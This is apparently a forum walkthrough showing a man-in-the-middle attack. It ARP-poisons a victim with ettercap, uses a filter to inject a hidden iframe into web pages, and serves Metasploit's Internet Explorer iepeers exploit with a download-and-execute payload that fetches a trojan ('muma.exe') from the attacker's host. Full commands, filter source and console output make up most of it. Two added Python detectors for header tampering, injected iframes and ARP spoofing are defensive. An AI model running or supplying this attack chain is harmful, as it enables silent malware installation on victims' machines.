Author: Kindle
What follows is only a simple demonstration. During a penetration test the filter script can be modified and a different payload substituted as needed, for example one that returns a cmd shell directly...
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 533 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8832 updated today (2010.03.16)
msf > use exploit/windows/browser/ie_iepeers_pointer
msf exploit(ie_iepeers_pointer) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ie_iepeers_pointer) > set SRVHOST 192.168.1.110
SRVHOST => 192.168.1.110
msf exploit(ie_iepeers_pointer) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(ie_iepeers_pointer) > set url http://192.168.102:99/muma.exe
url => http://192.168.102:99/muma.exe
msf exploit(ie_iepeers_pointer) > exploit
Exploit running as background job.
msf exploit(ie_iepeers_pointer) >
Using URL: http://192.168.1.110:8080/jG8gyIWoChq
Server started.
root@bt:~# cat kindle.filter
# client -> server: rewrite the Accept-Encoding header (same length, so the packet size is unchanged)
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Mousecat");
        msg("zapped Accept-Encoding!\n");
    }
}
# server -> client: insert a hidden iframe in front of the closing body tag
if (ip.proto == TCP && tcp.src == 80) {
    replace("</body>", "<iframe src=\"http://192.168.1.110:8080/jG8gyIWoChq\" width=0 height=0></iframe> </body>");
    msg("Filter Ran.\n");
}
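The filter above leaves two fingerprints in the traffic that a network sensor or proxy can check for: a same-length nonsense header where Accept-Encoding used to be (a byte-for-byte substitution has to keep the packet size, so the replacement is exactly 15 characters), and an HTML response carrying a zero-size iframe pointing at another host, typically together with a Content-Length header that no longer matches the body because bytes were inserted in flight without the header being updated. The following Python is an added detection example written for this page; it is not part of the original post or of ettercap. The request and response bytes, the host names in them and the iframe URL are constructed for the example.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed sample: a browser request after its Accept-Encoding header was rewritten in flight.
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: www.example.test\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)\r\n"
    b"Accept-Mousecat: gzip, deflate\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

# Constructed sample: the server's reply with a hidden iframe inserted before </body>.
# Content-Length still states the size of the untouched body (38 bytes).
TAMPERED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 38\r\n"
    b"\r\n"
    b"<html><body><p>hello</p>"
    b"<iframe src=\"http://injected.invalid/x\" width=0 height=0></iframe> </body></html>"
)

# Constructed sample: the same page exactly as the server sent it.
CLEAN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 38\r\n"
    b"\r\n"
    b"<html><body><p>hello</p></body></html>"
)

# Request headers a browser legitimately sends with the "Accept-" prefix.
KNOWN_ACCEPT_HEADERS = {
    "accept", "accept-language", "accept-charset",
    "accept-encoding", "accept-datetime", "accept-ranges",
}

IFRAME_TAG = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)
HIDDEN_ATTR = re.compile(
    rb"\b(?:width|height)\s*=\s*[\"']?0(?:px)?\b|display\s*:\s*none", re.IGNORECASE)
SRC_ATTR = re.compile(rb"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def parse_http(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split one HTTP message into its start line, lower-cased header dict and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_request(raw: bytes) -> List[str]:
    """Flag an unknown Accept-* header of exactly Accept-Encoding's length.

    An in-place substitution must keep the byte count, so a 15-character
    nonsense header where Accept-Encoding belongs is the tell-tale sign.
    """
    _, headers, _ = parse_http(raw)
    findings: List[str] = []
    for name in headers:
        if (name.startswith("accept-") and name not in KNOWN_ACCEPT_HEADERS
                and len(name) == len("accept-encoding")):
            findings.append(f"unknown header '{name.title()}' in place of Accept-Encoding")
    return findings


def inspect_response(raw: bytes, request_host: str = "") -> List[str]:
    """Flag body tampering: a stale Content-Length and hidden, off-origin iframes."""
    _, headers, body = parse_http(raw)
    findings: List[str] = []
    declared = headers.get("content-length", "")
    if declared.isdigit() and int(declared) != len(body):
        findings.append(f"Content-Length {declared} != actual body length {len(body)}")
    for tag in IFRAME_TAG.findall(body):
        if not HIDDEN_ATTR.search(tag):
            continue  # visible iframes are ordinary page content
        match = SRC_ATTR.search(tag)
        target = match.group(1).decode("latin-1") if match else "(no src)"
        host = urlsplit(target).hostname or ""
        origin = "off-origin" if request_host and host and host != request_host else "same-origin"
        findings.append(f"hidden iframe to {target} ({origin})")
    return findings


if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_REQUEST) + inspect_response(
            TAMPERED_RESPONSE, request_host="www.example.test"):
        print("ALERT:", finding)
    print("clean response findings:", inspect_response(CLEAN_RESPONSE, "www.example.test"))
```

Feed reassembled HTTP messages from a sensor into `inspect_request` and `inspect_response`; each returns an empty list for unmodified traffic. The length check is the most general of the three signals, since it fires on any in-flight insertion regardless of what was injected, while the iframe and header checks are specific to this filter's technique.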
root@bt:~# etterfilter kindle.filter -o demo.ef
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'kindle.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'demo.ef' done.
-> Script encoded into 15 instructions.
root@bt:~# ettercap -T -q -M arp /192.168.1.102/ -F demo.ef //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from demo.ef...
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:F1:10:73 192.168.1.110 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.102 00:22:64:84:CE:8D
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
zapped Accept-Encoding!
Filter Ran.
Filter Ran.
Filter Ran.
zapped Accept-Encoding!
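The "ARP poisoning victims" lines show the precondition for everything above: the victim and its gateway both have to accept the attacker's MAC for each other's IP address. On the wire that looks like an IP-to-MAC mapping that changes from what was previously learned, and like one MAC ending up as the answer for several IPs, which is exactly what a host or sensor that keeps its own ARP table can alert on (static entries for the gateway, or Dynamic ARP Inspection on a managed switch, prevent the poisoning outright). The following Python is an added detection example written for this page, not code from the original post. The gateway address and its MAC are constructed; the two other MACs are the ones ettercap printed above.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# One observed ARP reply (or gratuitous ARP): the sender IP and the MAC it claims.
ArpReply = Tuple[str, str]

# Constructed: the gateway's true mapping, learned at boot or configured statically.
TRUSTED_TABLE: Dict[str, str] = {"192.168.1.1": "aa:bb:cc:00:00:01"}

# Constructed observation sequence. The two non-gateway MACs are the ones printed in
# the ettercap output above; the sequence shows both halves of the poisoning.
SAMPLE_REPLIES: List[ArpReply] = [
    ("192.168.1.102", "00:22:64:84:CE:8D"),  # victim answers for itself: normal
    ("192.168.1.1",   "00:0C:29:F1:10:73"),  # gateway IP now claimed by a different MAC
    ("192.168.1.102", "00:0C:29:F1:10:73"),  # victim IP claimed by that same MAC
]


def detect_arp_spoof(replies: List[ArpReply],
                     trusted: Optional[Dict[str, str]] = None) -> List[str]:
    """Replay ARP replies in order and return the alerts a watcher would raise.

    Two signals are checked: an IP whose MAC differs from what was previously
    learned, and a single MAC that ends up answering for more than one IP.
    """
    table: Dict[str, str] = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ips_per_mac: Dict[str, Set[str]] = defaultdict(set)
    for ip, mac in table.items():
        ips_per_mac[mac].add(ip)
    flagged_macs: Set[str] = set()
    alerts: List[str] = []
    for ip, mac in replies:
        mac = mac.lower()
        previous = table.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"{ip} changed from {previous} to {mac}")
        table[ip] = mac
        ips_per_mac[mac].add(ip)
        # Report each over-claiming MAC once, not on every further reply it sends.
        if len(ips_per_mac[mac]) > 1 and mac not in flagged_macs:
            flagged_macs.add(mac)
            alerts.append(f"{mac} answers for several IPs: {sorted(ips_per_mac[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES, TRUSTED_TABLE):
        print("ALERT:", alert)
```

In a real deployment the replies come from a packet capture on the segment being watched, and the trusted table is seeded from the gateway's known MAC so that the very first spoofed reply for it is caught rather than learned.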
Open Internet Explorer and visit 9ku.com, or any page that contains a body tag: the page is rewritten to carry our web trojan, and the compromised machine shows up in msf:
msf exploit(ie_iepeers_pointer) >
Using URL: http://192.168.1.110:8080/jG8gyIWoChq
Server started.
Sending Internet Explorer iepeers.dll Use After Free to 192.168.1.102:4272…
Online demo links:
Exploit iepeers vul whith ettercap (Part 1)
http://www.linux520.com/viewthread.php?tid=457
By c4rp3nt3r: Exploit iepeers vul whith ettercap (Part 2)
http://www.linux520.com/viewthread.php?tid=459